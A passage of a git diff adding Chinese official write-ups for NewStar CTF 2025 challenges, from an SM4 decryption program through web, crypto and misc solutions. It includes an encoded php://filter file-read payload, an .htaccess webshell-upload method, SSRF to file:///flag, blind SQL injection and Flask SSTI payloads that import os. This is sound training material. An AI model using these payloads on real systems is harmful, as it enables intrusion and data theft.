0x05}, + {0x2b, 0x67, 0x9a, 0x76, 0x2a, 0xbe, 0x04, 0xc3, 0xaa, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99}, + {0x9c, 0x42, 0x50, 0xf4, 0x91, 0xef, 0x98, 0x7a, 0x33, 0x54, 0x0b, 0x43, 0xed, 0xcf, 0xac, 0x62}, + {0xe4, 0xb3, 0x1c, 0xa9, 0xc9, 0x08, 0xe8, 0x95, 0x80, 0xdf, 0x94, 0xfa, 0x75, 0x8f, 0x3f, 0xa6}, + {0x47, 0x07, 0xa7, 0xfc, 0xf3, 0x73, 0x17, 0xba, 0x83, 0x59, 0x3c, 0x19, 0xe6, 0x85, 0x4f, 0xa8}, + {0x68, 0x6b, 0x81, 0xb2, 0x71, 0x64, 0xda, 0x8b, 0xf8, 0xeb, 0x0f, 0x4b, 0x70, 0x56, 0x9d, 0x35}, + {0x1e, 0x24, 0x0e, 0x5e, 0x63, 0x58, 0xd1, 0xa2, 0x25, 0x22, 0x7c, 0x3b, 0x01, 0x21, 0x78, 0x87}, + {0xd4, 0x00, 0x46, 0x57, 0x9f, 0xd3, 0x27, 0x52, 0x4c, 0x36, 0x02, 0xe7, 0xa0, 0xc4, 0xc8, 0x9e}, + {0xea, 0xbf, 0x8a, 0xd2, 0x40, 0xc7, 0x38, 0xb5, 0xa3, 0xf7, 0xf2, 0xce, 0xf9, 0x61, 0x15, 0xa1}, + {0xe0, 0xae, 0x5d, 0xa4, 0x9b, 0x34, 0x1a, 0x55, 0xad, 0x93, 0x32, 0x30, 0xf5, 0x8c, 0xb1, 0xe3}, + {0x1d, 0xf6, 0xe2, 0x2e, 0x82, 0x66, 0xca, 0x60, 0xc0, 0x29, 0x23, 0xab, 0x0d, 0x53, 0x4e, 0x6f}, + {0xd5, 0xdb, 0x37, 0x45, 0xde, 0xfd, 0x8e, 0x2f, 0x03, 0xff, 0x6a, 0x72, 0x6d, 0x6c, 0x5b, 0x51}, + {0x8d, 0x1b, 0xaf, 0x92, 0xbb, 0xdd, 0xbc, 0x7f, 0x11, 0xd9, 0x5c, 0x41, 0x1f, 0x10, 0x5a, 0xd8}, + {0x0a, 0xc1, 0x31, 0x88, 0xa5, 0xcd, 0x7b, 0xbd, 0x2d, 0x74, 0xd0, 0x12, 0xb8, 0xe5, 0xb4, 0xb0}, + {0x89, 0x69, 0x97, 0x4a, 0x0c, 0x96, 0x77, 0x7e, 0x65, 0xb9, 0xf1, 0x09, 0xc5, 0x6e, 0xc6, 0x84}, + {0x18, 0xf0, 0x7d, 0xec, 0x3a, 0xdc, 0x4d, 0x20, 0x79, 0xee, 0x5f, 0x3e, 0xd7, 0xcb, 0x39, 0x48}}; + +unsigned int RK[32]; +int sm4_to_tao(unsigned char *in, unsigned char *out, int len) +{ + unsigned char a, b, c, d; + int i = 0; + + for (i = 0; i < len; i++) + { + a = in[i]; + b = a >> 4; + c = a & 0x0f; + d = TAO[b][c]; + out[i] = d; + } + + return 0; +} + +int sm4_to_xor_2(unsigned char *a, unsigned char *b, unsigned char *out, int len) +{ + int i = 0; + + for (i = 0; i < len; i++) + { + out[i] = a[i] ^ b[i]; + } + + return 0; +} + +int sm4_to_xor_4(unsigned char *a, unsigned char *b, unsigned char *c, unsigned char *d, unsigned char *out, int len) +{ + int i = 0; + + for (i = 0; i < len; i++) + { + out[i] = a[i] ^ b[i] ^ c[i] ^ d[i]; + } + + return 0; +} +int sm4_get_rki(unsigned int *mk) +{ + unsigned int k[36]; + unsigned int u, v, w; + int i = 0; + int j = 0; + + sm4_to_xor_2((unsigned char *)mk, (unsigned char *)FK, (unsigned char *)k, 16); + + for (i = 0; i < 32; i++) + { + sm4_to_xor_4((unsigned char *)(k + i + 1), (unsigned char *)(k + i + 2), (unsigned char *)(k + i + 3), (unsigned char *)(CK + i), (unsigned char *)(&u), 4); + + sm4_to_tao((unsigned char *)(&u), (unsigned char *)(&v), 4); + + w = L2(v); + + sm4_to_xor_2((unsigned char *)(k + i), (unsigned char *)(&w), (unsigned char *)(k + i + 4), 4); + + RK[i] = k[i + 4]; + } + + return 0; +} + +int sm4_one_enc(unsigned int *mk, unsigned int *in, unsigned int *out) +{ + unsigned int x[36]; + unsigned int u, v, w; + int i = 0; + int j = 0; + + x[0] = in[0]; + x[1] = in[1]; + x[2] = in[2]; + x[3] = in[3]; + + sm4_get_rki(mk); + + for (i = 0; i < 32; i++) + { + sm4_to_xor_4((unsigned char *)(x + i + 1), (unsigned char *)(x + i + 2), (unsigned char *)(x + i + 3), (unsigned char *)(RK + i), (unsigned char *)(&u), 4); + + sm4_to_tao((unsigned char *)(&u), (unsigned char *)(&v), 4); + + w = L1(v); + + sm4_to_xor_2((unsigned char *)(x + i), (unsigned char *)(&w), (unsigned char *)(x + i + 4), 4); + + x[i + 4]; + } + + out[0] = x[35]; + out[1] = x[34]; + out[2] = x[33]; + out[3] = x[32]; + + return 0; +} + +int sm4_one_dec(unsigned int *mk, unsigned int *in, unsigned int *out) +{ + unsigned int x[36]; + unsigned int u, v, w; + int i = 0; + int j = 0; + + x[0] = in[0]; + x[1] = in[1]; + x[2] = in[2]; + x[3] = in[3]; + + sm4_get_rki(mk); + + for (i = 0; i < 32; i++) + { + sm4_to_xor_4((unsigned char *)(x + i + 1), (unsigned char *)(x + i + 2), (unsigned char *)(x + i + 3), (unsigned char *)(RK + 31 - i), (unsigned char *)(&u), 4); + + sm4_to_tao((unsigned char *)(&u), (unsigned char *)(&v), 4); + + w = L1(v); + + sm4_to_xor_2((unsigned char *)(x + i), (unsigned char *)(&w), (unsigned char *)(x + i + 4), 4); + + x[i + 4]; + } + + out[0] = x[35]; + out[1] = x[34]; + out[2] = x[33]; + out[3] = x[32]; + + return 0; +} + +int main() +{ + // unsigned char mk[16] = "1234567890abcdef"; + unsigned int mk[4] = {1, 1, 4,5}; + unsigned int mm[4]= {0xB60DE9B3, 0x7A7A7B4C, 0xC7D03789, 0x2A278E6C}; + unsigned char *b = (unsigned char *)mm; + unsigned char c[16] = {0}; + + sm4_one_dec((unsigned int *)mk, (unsigned int *)b, (unsigned int *)c); + for (size_t i = 0; i < 16; i++) + { + printf("%c", c[i]); + } + + return 0; +} +``` diff --git a/docs/wp/2025/week3/web/e-secret-plan.md b/docs/wp/2025/week3/web/e-secret-plan.md new file mode 100644 index 0000000..897fbb1 --- /dev/null +++ b/docs/wp/2025/week3/web/e-secret-plan.md @@ -0,0 +1,53 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 小 E 的秘密计划 + + + +本题主要考查备份泄露、Git 泄露和 DS_Store 泄露的利用。 + + +结合页面提示 `先找到网站备份文件` 使用 dirsearch 进行备份扫描,下载 `www.zip` 文件 + +根据提示我们知道网站使用 [git](https://git-scm.com/install/) 进行版本管理。如果你不熟悉 Git,可以前往 进一步学习。 + +`git reflog` 会显示所有引用(HEAD、分支等)的移动历史,包括切换、合并和删除操作。 + +![git reflog 删除分支记录](/assets/images/wp/2025/week3/e-secret-plan_1.png) + +我们可以看到有一个叫做 `test` 的分支被删除了,可以优先恢复并排查。 + +我们复制 reflog 每一行前 7 位 Hash,使用下列命令还原。 + +```bash +git branch test 353b98f +git checkout test +``` + +此时 `user.php` 泄露了明文账密 + +```php + 'admin', + 'password' => 'f75cc3eb-21e0-4713-9c30-998a8edb13de' + ]; +} +``` + +使用此账密登录 `/public-555edc76-9621-4997-86b9-01483a50293e` 进入 dashboard。 +之后结合提示 `小E拿 mac 写的这段代码`,扫描发现 [.DS_Store](https://baike.baidu.com/item/.DS_Store/3395876) 文件。 + +下载 `.DS_Store` 文件后,尝试利用 [ds_store_exp](https://github.com/lijiejie/ds_store_exp) 工具还原信息。 + +![DS_Store 文件解析结果](/assets/images/wp/2025/week3/e-secret-plan_2.png) + +得到 FLAG 地址,访问后获得最终 FLAG。 diff --git a/docs/wp/2025/week3/web/ez-chain.md b/docs/wp/2025/week3/web/ez-chain.md new file mode 100644 index 0000000..b441ebf --- /dev/null +++ b/docs/wp/2025/week3/web/ez-chain.md @@ -0,0 +1,92 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# ez-chain + +> 碎碎念:本来想考 `filter_chain` 所以才取这个名字,大改之后其实不需要多个过滤器组成 chain 来着…… + +```php + +``` + +通读一下本题的代码逻辑:输入一个文件名,然后读取文件。 + +重点:`filter()` 在对 **原始 GET 参数**(还没 `urldecode`)做黑名单检测;而在 `file_get_contents` 之后,`filter_output()` 会检验并对输出做 **重复的 base64_decode**。 + +搜索一下被过滤掉的关键词:filter php,可以知道本题考的是PHP的伪协议。 + +题目里 `filter()` 检测了一堆 **关键词**(`php`、`filter`、`base64`、`/`、`:`、`flag` 等),这些都是字母或符号,普通的 URL 编码(浏览器/工具自动的)不会把字母全部编码,所以它们仍会在 `filter()` 的原始字符串里出现并被匹配到。如果我们把整条伪协议(包括字母)**逐字符变为 `%hh`**(例如 `p`->`%70`,`h`->`%68`,`p`->`%70`),那么原始 GET 参数里就不再包含 `php` / `filter` / `base64` / `:` / `/` 等可检测的文本,就能绕过 `filter()`。服务器随后执行 `urldecode()`(一次),把 `%70%68%70%3A%2F%2F...` 还原成 `php://filter/...`,`file_get_contents` 正常工作。 + +但是,我们知道flag{}一直都包含f,而且base64的包装也没用(会被反复解开),那怎么办? + +聪明的小朋友们应该会发现,平台的动态 flag 的内部其实是一个UUID,**它的字符范围永远是 0-f (16进制)** + +而 php filter 里面有一个包装器是**rot13**。 + +0-f 和 flag 经过 rot13 之后就不存在 f 了。所以可以直接绕过过滤。 + +所以payload就是: + +```plaintext +php://filter/string.rot13/resource=/flag +``` + +编码后: + +```plaintext +%70%68%70%3a%2f%2f%66%69%6c%74%65%72%2f%73%74%72%69%6e%67%2e%72%6f%74%31%33%2f%72%65%73%6f%75%72%63%65%3d%2f%66%6c%61%67 +``` + +得到的 flag 再次 rot13 即可 diff --git a/docs/wp/2025/week3/web/mirror-gate.md b/docs/wp/2025/week3/web/mirror-gate.md new file mode 100644 index 0000000..b7bd647 --- /dev/null +++ b/docs/wp/2025/week3/web/mirror-gate.md @@ -0,0 +1,41 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# mirror_gate + +根据提示 `请设法找出他系统中的应用配置缺陷,突破上传限制。`,我们先抓一个响应包,发现存在 `Server: Apache/2.4.51 (Debian)` 头部, +猜测是 `.htaccess`(Apache 配置文件)解析问题。 + +## 收集信息 + +访问网站,F12 查看前端源码发现 + +```plaintext +flag is in flag.php --- 说明 FLAG 在 flag.php +``` + +```plaintext +HINT: c29tZXRoaW5nX2lzX2luXy91cGxvYWRzLw== +base64 解码:something_is_in_/uploads/ +``` + +上传 jpg 也有 hint:dirsearch + +## 漏洞利用 + +用 dirsearch 扫描 `ip:端口/uploads`,发现 `.htaccess` 返回了 200,印证了我们的猜想。 + +下载 `.htaccess` 得到 + +```plaintext +AddType application/x-httpd-php .webp +``` + +这让上传的 `.webp` 文件被解析成 `php` 类型。 + +接下来上传 webp 一句话木马,利用解析漏洞让我们的 `.webp` 解析成 php, 从而绕过检查。再简单地绕过一下 waf 就可以,这里打法很多。 + +```php + +``` diff --git a/docs/wp/2025/week3/web/mygo.md b/docs/wp/2025/week3/web/mygo.md new file mode 100644 index 0000000..110c8a6 --- /dev/null +++ b/docs/wp/2025/week3/web/mygo.md @@ -0,0 +1,48 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# MyGO!!!!! + +~~先演奏一下春日影~~,抓几个包,发现有一个未过滤的 proxy,可能可以打 SSRF。 + +![抓包发现 proxy 参数](/assets/images/wp/2025/week3/mygo_1.png) + +尝试发现只允许 http 协议 + +![仅允许 HTTP 协议](/assets/images/wp/2025/week3/mygo_2.png) + +dirsearch 扫描目录发现有 `flag.php`,直接访问 403,尝试 SSRF 访问 `/index.php?proxy=http://127.0.0.1/flag.php` + +得到源码 + +```php + +``` + +curl 允许 file 协议,`/index.php?proxy=http://127.0.0.1/flag.php?soyorin=file:///flag` 成功拿到 FLAG。 diff --git a/docs/wp/2025/week3/web/white-k-2.md b/docs/wp/2025/week3/web/white-k-2.md new file mode 100644 index 0000000..7a0c349 --- /dev/null +++ b/docs/wp/2025/week3/web/white-k-2.md @@ -0,0 +1,23 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 白帽小 K 的故事(2) + +这是一道 SQL 盲注题目,跟随流程,查看 hint,给了两点提示 + +1. 后端查询逻辑是 `SELECT 1 from Terra.animal WHERE name = '$name'` +2. 要使用盲注 + +这提示我们 + +1. 可以利用 `'` 闭合达成 SQL 注入 +2. 注入后响应不包含 sql 语句执行结果或原始报错 + +简单手动 fuzz 一下 waf,发现只过滤了空格(抓包返回 `{"status":"error","message":"Invalid characters detected"}`),我们用括号绕过就行。 + +我们构造 `amiya'AND(${payload})#`,由于用户 amiya 存在,`WHERE name = 'amiya'` 为真,此时 `payload` 的真假决定了表达式的返回,如果 `payload` 为真,应当返回正常登录的结果,反之,则会返回用户不存在。这就符合了**布尔盲注**的条件。 + +由于手动盲注耗时长,我们需要编写脚本去自动完成盲注,通常我们会使用二分搜索算法和多线程来优化盲注速度。这里给出我的解题脚本: + + diff --git a/docs/wp/2025/week3/web/whossti.md b/docs/wp/2025/week3/web/whossti.md new file mode 100644 index 0000000..c996898 --- /dev/null +++ b/docs/wp/2025/week3/web/whossti.md @@ -0,0 +1,33 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# who'ssti + +本题考验 SSTI 基本功,由于没设置过滤,搜索用例通过 `eval` 调用就行。 + +这里由于是 flask 环境,可以利用 `config` 或 `lipsum` 等 flask 环境内的自带模块快捷地取得全局对象。 + + + +Lipsum 是一个用于生成随机化 [Lorem Ipsum 文本](https://cn.lipsum.com/)的 Python 模块 + + +## 全部题解 + +```py +{{lipsum.__globals__.__builtins__.eval("__import__('re').findall('1', '12')")}} +{{lipsum.__globals__.__builtins__.eval("__import__('difflib').get_close_matches('ciallo',['hello','ciao'])")}} +{{lipsum.__globals__.__builtins__.eval("__import__('random').randint(0,10)")}} +{{lipsum.__globals__.__builtins__.eval("__import__('textwrap').dedent('ciallo')")}} +{{lipsum.__globals__.__builtins__.__import__('statistics').mean([1,2])}} +{{lipsum.__globals__.__builtins__.__import__('statistics').fmean([1,2])}} +{{lipsum.__globals__.__builtins__.__import__('random').choice([1, 2])}} +{{lipsum.__globals__.__builtins__.__import__('os').listdir('.')}} +{{lipsum.__globals__.__builtins__.__import__('json').loads('{"a":1}')}} +{{lipsum.__globals__.__builtins__.__import__('numpy').sum([1, 2])}} +``` diff --git a/docs/wp/2025/week4/crypto/conjugate-maze.md b/docs/wp/2025/week4/crypto/conjugate-maze.md new file mode 100644 index 0000000..48ffb14 --- /dev/null +++ b/docs/wp/2025/week4/crypto/conjugate-maze.md @@ -0,0 +1,146 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 共轭迷宫 + +### 题目背景知识 + +1. DH 密钥交换协议 + +DH(Diffie-Hellman)协议是一种密钥交换算法,允许两个通信方在不安全的信道上建立一个共享密钥。基本思想是:Alice 和 Bob 各自生成私钥 $a$ 和 $b$,计算公钥 $P_A = g^a \bmod p$、$P_B = g^b \bmod p$。交换公钥后,各自计算共享密钥 $K = \text{对方公钥}^{\text{自己的私钥}} \bmod p$。由于 $g^{ab} = g^{ba}$,双方得到相同的共享密钥。 + +2. 四元数 + +四元数是复数的扩展,形式为 $q = w + xi + yj + zk$。 + +- $w$ 是实部,$x, y, z$ 是三个虚部。 + +- $i^2 = j^2 = k^2 = ijk = -1$。 + +- 四元数乘法不满足交换律:$q_1 \times q_2 \ne q_2 \times q_1$。 + +- 共轭四元数:$\operatorname{conj}(q) = w - xi - yj - zk$。 + +- 逆四元数:$q^{-1} = \operatorname{conj}(q) / ||q||^2$。 + +### 题目分析 + +本题将 DH 协议推广到四元数领域:生成元 $g$ 由 FLAG 编码而成,Alice 和 Bob 使用四元数私钥 $a, b$。 + +公钥计算:$P_A = a \times g \times a^{-1}$,$P_B = b \times g \times b^{-1}$。 + +共享密钥:$K = a \times P_B \times a^{-1} = b \times P_A \times b^{-1}$。 + +关键观察:由于共轭运算的特性,共享密钥 $K$ 实际上等于 $b \times a \times g \times a^{-1} \times b^{-1}$。 + +题目给出了归一化后的共享密钥 $K$ 和原始 $g$ 的模平方 `norm_squared`,由此可以得出原始的 $K$。 + +```python +def recover_from_norm_squared(normalized_quat, norm_squared): + getcontext().prec = 50 + norm = Decimal(norm_squared).sqrt() + w_recovered = norm * Decimal(normalized_quat.w) + x_recovered = norm * Decimal(normalized_quat.x) + y_recovered = norm * Decimal(normalized_quat.y) + z_recovered = norm * Decimal(normalized_quat.z) + return Quaternion(w_recovered, x_recovered, y_recovered, z_recovered) +``` + +在四元数 DH 中: + +$K = a \times (b \times g \times b^{-1}) \times a^{-1} = (a \times b) \times g \times (b^{-1} \times a^{-1})$。 + +由于 $K$ 已知,我们需要找到 $g$。 + +关键技巧:题目中私钥 $a, b$ 是特殊构造的(45° 和 60° 旋转),它们的乘积具有可交换性,$a$ 与 $a^{-1}$ 相消,$b$ 与 $b^{-1}$ 相消,使得 $K = g$。 + +注意得到的 $K$ 的四个分量,需要使用题目提供的后六位数据进行微调(这是在转换中出现的数据的微小差异 1)。 + +### 完整解题代码 + +```python +import math + +from Crypto.Util.number import long_to_bytes +from torchvision.transforms.v2.functional import normalize +from decimal import Decimal, getcontext + +def recover_from_norm_squared(normalized_quat, norm_squared): + getcontext().prec = 50 + + norm = Decimal(norm_squared).sqrt() + w_norm = Decimal(normalized_quat.w) + x_norm = Decimal(normalized_quat.x) + y_norm = Decimal(normalized_quat.y) + z_norm = Decimal(normalized_quat.z) + + w_recovered = norm * w_norm + x_recovered = norm * x_norm + y_recovered = norm * y_norm + z_recovered = norm * z_norm + + return Quaternion(w_recovered, x_recovered, y_recovered, z_recovered) + +import numpy as np +from math import sqrt +import hashlib + +import numpy as np +from math import sqrt +import hashlib +from decimal import Decimal, getcontext + +class Quaternion: + def __init__(self, w, x, y, z): + self.w = w + self.x = x + self.y = y + self.z = z + + def __mul__(self, other): + w1, x1, y1, z1 = self.w, self.x, self.y, self.z + w2, x2, y2, z2 = other.w, other.x, other.y, other.z + w = w1 * w2 - x1 * x2 - y1 * y2 - z1 * z2 + x = w1 * x2 + x1 * w2 + y1 * z2 - z1 * y2 + y = w1 * y2 - x1 * z2 + y1 * w2 + z1 * x2 + z = w1 * z2 + x1 * y2 - y1 * x2 + z1 * w2 + return Quaternion(w, x, y, z) + + def inv(self): + norm_sq = self.w**2 + self.x**2 + self.y**2 + self.z**2 + if abs(norm_sq) < 1e-10: + raise ValueError("Cannot invert quaternion with zero norm") + return Quaternion(self.w/norm_sq, -self.x/norm_sq, -self.y/norm_sq, -self.z/norm_sq) + + def conjugate(self): + return Quaternion(self.w, -self.x, -self.y, -self.z) + + def norm(self): + getcontext().prec = 50 + w = Decimal(self.w) + x = Decimal(self.x) + y = Decimal(self.y) + z = Decimal(self.z) + norm_sq = w * w + x * x + y * y + z * z + n = norm_sq.sqrt() + + return Quaternion(w/n, x/n, y/n, z/n),norm_sq,n + + def __str__(self): + return f"{self.w}+{self.x}i+{self.y}j+{self.z}k" + + def __eq__(self, other): + return (abs(self.w - other.w) < 1e-10 and + abs(self.x - other.x) < 1e-10 and + abs(self.y - other.y) < 1e-10 and + abs(self.z - other.z) < 1e-10) + +norm_squared=15960922284361974605582033637987025644912788 +normalized=Quaternion( 0.47292225874042030768,0.44018598307489329914,0.54174915328248053438,0.53766968708489053908) +recovered = recover_from_norm_squared(normalized, norm_squared) +print(f"恢复的原始: {recovered}") +w,x,y,z=1889377532526941271603,1758592434980910292847,2164348705437511939167,2148050779856765994109 +print(long_to_bytes(w),long_to_bytes(x)) +print(long_to_bytes(y),long_to_bytes(z)) +``` diff --git a/docs/wp/2025/week4/crypto/one-and-only.md b/docs/wp/2025/week4/crypto/one-and-only.md new file mode 100644 index 0000000..0f79e58 --- /dev/null +++ b/docs/wp/2025/week4/crypto/one-and-only.md @@ -0,0 +1,81 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 独一无二 + + + +本题考查 ECDSA。 + + +题目关键在于复用了随机数 $k$ ,这导致你可以计算出私钥 $D$ + +```python +from Crypto.Util.number import bytes_to_long as b2l +from Crypto.Util.Padding import pad +from Crypto.Cipher import AES +from sympy import prevprime +import uuid +import random +import os + +d=os.urandom(16) +D=b2l(d) #签名的私钥 D +FLAG = f"FLAG{{{uuid.uuid4()}}}" +cipher=AES.new(d,AES.MODE_ECB) +ct=cipher.encrypt(pad(FLAG.encode(),16)) +print("ct=",ct) + +mes1=b"If you used the same random number when signing," +mes2=b" then you need to be careful." +e1, e2 = b2l(mes1), b2l(mes2) + +p=random_prime(2**128) +A,B=random.randint(1,p-1),random.randint(1,p-1) +E = EllipticCurve(Zmod(p),[A, B]) +G=E.gens()[0] +n = prevprime(E.order()) +print("n=",n) + +k=random.randint(1,n-1) +Q=k*G +r=int(Q[0])%n +k_inv = pow(k, -1, n) +assert r!=0 + +s1 = (k_inv * (e1 + r * D)) % n +s2 = (k_inv * (e2 + r * D)) % n #这里复用了随机数 k +print("(r1,s1)=",(r,s1)) +print("(r2,s2)=",(r,s2)) +``` + +```python +#EXP + +ct= +n= +(r1,s1)= +(r2,s2)= + +from Crypto.Cipher import AES +from Crypto.Util.number import long_to_bytes,bytes_to_long as b2l + +mes1=b"If you used the same random number when signing," +mes2=b" then you need to be careful." +e1=b2l(mes1) +e2=b2l(mes2) + +k=(e1-e2)*pow(s1-s2,-1,n)%n #通过关系式求解出 k +d=(s1*k-e1)*pow(r1,-1,n)%n #通过 k 求解出私钥 D + +d=long_to_bytes(int(d)) +cipher=AES.new(d,AES.MODE_ECB) +pt=cipher.decrypt(ct) +print(pt) + +``` diff --git a/docs/wp/2025/week4/crypto/random-4.md b/docs/wp/2025/week4/crypto/random-4.md new file mode 100644 index 0000000..bffc04b --- /dev/null +++ b/docs/wp/2025/week4/crypto/random-4.md @@ -0,0 +1,39 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 随机数之旅 4 + + + +本题考查线性代数。 + + +FLAG 被切片为 14 块,每块转为数字后得到秘密向量 $c$。 +$x$ 初始为 14 个随机数字,然后按如下关系扩展 $x$ 序列: + +$$x_k = (c_0*x_{k-14} + c_1*x_{k-13} + ... + c_{13}*x_{k-1}) \pmod{p}$$ + +题目给出了 $p$ 和 $x$ 序列的最后 28 位。 + +利用这 28 位可以根据递推关系列出 14 个关于 $c_i$ 的 14 元方程,求解即可。 + +```python +p= +x= + +n=14 +A=matrix(Zmod(p),n,n) +for i in range(n): + for j in range(n): + A[i,j]=x[i+j] +b=x[-14:] +c=A.solve_right(b) + +m=b"".join(long_to_bytes(int(c[i])) for i in range(n)) + +``` diff --git a/docs/wp/2025/week4/crypto/silkworm-secret.md b/docs/wp/2025/week4/crypto/silkworm-secret.md new file mode 100644 index 0000000..e539506 --- /dev/null +++ b/docs/wp/2025/week4/crypto/silkworm-secret.md @@ -0,0 +1,40 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 天虫的秘密 + + + +本题考查 Padding Oracle Attack。 + + +题目生成 `key` 和 `iv1`,并使用 AES-CBC 模式加密 FLAG 得到 `ct`,输出 `iv1+ct` 的 Base64 编码。 +`oracle` 接收一段 `iv+ct` 的 Base64 编码,然后使用 `key` 和 `iv` 解密 `ct` 得到 `pt`,返回 `pt` 是否具有正确的 padding。 +选手可以无限次交互。 + +> [!NOTE] +> padding: +> 这里使用了 `unpad(pt,16)`,填充协议是 PKCS#7。正确的填充格式是:当明文距离分块长度还差 $T$ 个字节($0 0 and potential_b > 0 and potential_c > 0 and + potential_a.bit_length() <= 200 and + potential_b.bit_length() <= 200 and + potential_c.bit_length() <= 200 and + (k * potential_a + m * potential_b + n * potential_c) % p == f): + + print(f"🎉 正交格方法找到解!") + print(f"a = {potential_a}") + print(f"b = {potential_b}") + print(f"c = {potential_c}") + return potential_a, potential_b, potential_c + + print("正交格方法未找到合适解") + return None + +# 解码 FLAG +def decode_flag(a, b, c): + """从 a,b,c 解码 FLAG""" + try: + # 尝试不同的字节顺序 + for byte_order in ['big', 'little']: + try: + a_bytes = a.to_bytes((a.bit_length() + 7) // 8, byte_order) + b_bytes = b.to_bytes((b.bit_length() + 7) // 8, byte_order) + c_bytes = c.to_bytes((c.bit_length() + 7) // 8, byte_order) + + flag_bytes = a_bytes + b_bytes + c_bytes + FLAG = flag_bytes.decode('ascii', errors='ignore') + + if 'FLAG{' in FLAG: + return FLAG + except: + continue + return None + except: + return None + +# 题目参数 +p = 10424356578148041779853991789187969944186570125402901113699573185144158488847151089093649435805832723680640302469301322004769382556869280204369016044400623 +k = 2016425917343526209264752974016973527106088400191647819396444997081866888816818440804306653900752825844532111319244334210470353279795203950886189568717273 +m = 9640575609666038466312358795458735166723157003124018050805657432015561577987823522956739610343817276374800232163184447140344754253531140765054930193240661 +n = 8539207304708818916453730202381072788689351891251165656488809155919585187699733568697903825636944248694317545906020707873051567183468920809837554174735591 +f = 3760813688323379339493776734416231127517302841171887658445242754803946122769018586447782634756726656702581791734772105099204609201876825961922712387326893 + +# 主求解流程 +print("开始求解三重密钥锁问题...") +print(f"已知参数: p={p}") +print(f"系数 k={k}") +print(f"系数 m={m}") +print(f"系数 n={n}") +print(f"验证值 f={f}") + +a_sol, b_sol, c_sol = solve_hssp(p, k, m, n, f) + +if a_sol is not None: + print("\n=== 验证解 ===") + computed_f = (k * a_sol + m * b_sol + n * c_sol) % p + print(f"计算: k*a + m*b + n*c mod p = {computed_f}") + print(f"目标: f = {f}") + print(f"验证通过: {computed_f == f}") + + # 解码 FLAG + flag_found = decode_flag(a_sol, b_sol, c_sol) + if flag_found: + print(f"\n🎉 成功找到 FLAG: {flag_found}") + else: + print("找到 a,b,c 但解码 FLAG 失败,尝试手动解码...") + print(f"a = {a_sol}") + print(f"b = {b_sol}") + print(f"c = {c_sol}") +else: + print("未能找到解") +``` diff --git a/docs/wp/2025/week4/index.md b/docs/wp/2025/week4/index.md new file mode 100644 index 0000000..42b2eea --- /dev/null +++ b/docs/wp/2025/week4/index.md @@ -0,0 +1,9 @@ +--- +title: WriteUp +titleTemplate: ":title - NewStar CTF 2025" +comments: false +--- + +# WriteUp - NewStar CTF 2025 + +这里是 NewStar CTF 2025 Week 4 的官方 WriteUp 页面。 diff --git a/docs/wp/2025/week4/misc/chaotic-site.md b/docs/wp/2025/week4/misc/chaotic-site.md new file mode 100644 index 0000000..d3cea76 --- /dev/null +++ b/docs/wp/2025/week4/misc/chaotic-site.md @@ -0,0 +1,41 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 混乱的网站 + +本题打开后是一个 CTF 介绍网站。查看源码可以发现 `function.js`,其中 misc 模块会调用 `_return()`。 + +![源码中的 function.js](/assets/images/wp/2025/week4/chaotic-site_1.png) + +将混淆后的 JavaScript 做十六进制解码和格式化,可以看到 `_pick` 会选取数组中的第三个元素并做 Base64 解码。实际执行 `_return()` 时,会跳转到 `https://newstar.games/`,同时把 `window["js_very_good"]` 赋给 `window["$"]["$"]`。因此 `js_very_good` 很可能是 FLAG 的一部分。 + +题目描述提到网站还没搭建完成,并且页面中存在注册入口。继续进行目录扫描,可以发现 `www.zip` 备份文件。 + +![目录扫描发现 www.zip](/assets/images/wp/2025/week4/chaotic-site_2.png) + +下载备份后,在 `dashboard.php` 中发现一段 Gzip + Base64 的混淆内容。 + +![dashboard.php 混淆内容](/assets/images/wp/2025/week4/chaotic-site_3.png) + +将执行函数改成输出函数后,可以得到一层 `o00o0o` 风格的嵌套混淆。 + +![解出嵌套混淆代码](/assets/images/wp/2025/week4/chaotic-site_4.png) + +继续把后续 Base64 内容取出解码,再替换执行函数为输出函数。这里建议输出时加上 `htmlspecialchars`,否则解出的 PHP 代码会直接执行,页面上看不到源码。 + +最终解出的逻辑会持续写入一个后门文件,其中关键条件是 `flag2` 参数的 MD5 值等于: + +```plaintext +87c298a56e0caa355872ab47db11e06c +``` + +查得 `flag2` 为 `ns2025`。 + +![触发后门得到 FLAG](/assets/images/wp/2025/week4/chaotic-site_5.png) + +结合前面得到的 `js_very_good`,最终 FLAG 为: + +```plaintext +FLAG{js_very_good_ns2025} +``` diff --git a/docs/wp/2025/week4/misc/ir-intro.md b/docs/wp/2025/week4/misc/ir-intro.md new file mode 100644 index 0000000..822f2a9 --- /dev/null +++ b/docs/wp/2025/week4/misc/ir-intro.md @@ -0,0 +1,67 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 应急响应:初识 + +解压压缩包,打开 VMware 右键->扫描虚拟机 + +![VMware 扫描虚拟机](/assets/images/wp/2025/week4/ir-intro_1.png) + +选择刚才解压的目录,点击完成。启动虚拟机,选择我已复制该虚拟机 + +![启动复制的虚拟机](/assets/images/wp/2025/week4/ir-intro_2.png) + +输入密码进入桌面后,打开设置-应用-安装的应用,可以看到安装了 phpstudy + +打开 phpstudy,在网站栏,点击管理-打开根目录,可以快速定位网站路径 + +![phpstudy 网站根目录](/assets/images/wp/2025/week4/ir-intro_3.png) + +##### 木马连接密码 + +我们进入 uploads 文件夹,在查看中,勾选查看隐藏的项目,可以看到\_\_\_.php + +![隐藏的 PHP 木马文件](/assets/images/wp/2025/week4/ir-intro_4.png) + +打开文件时,发现 windows defender 爆出发现威胁。我们还原后查看文件 + +![冰蝎木马密钥校验](/assets/images/wp/2025/week4/ir-intro_5.png) + 